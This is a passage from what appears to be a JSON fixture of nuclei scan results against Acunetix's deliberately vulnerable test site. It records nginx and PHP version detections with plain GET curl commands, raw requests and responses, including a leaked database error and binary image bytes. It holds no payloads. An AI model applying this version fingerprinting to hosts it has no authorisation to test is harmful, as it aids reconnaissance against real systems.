+ "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:34:59.951Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.04\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:56 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 283, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:44.0) Gecko/20100101 Firefox/44.0' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:35:00.044Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:44.0) Gecko/20100101 Firefox/44.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:56 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 284, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:35:00.152Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:34:56 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 285, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:35:00.244Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:57 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 286, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:35:00.329Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 287, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:35:00.520Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:54 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 288, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:35:00.673Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:58 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 289, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "php", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:35:00.779Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:58 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a 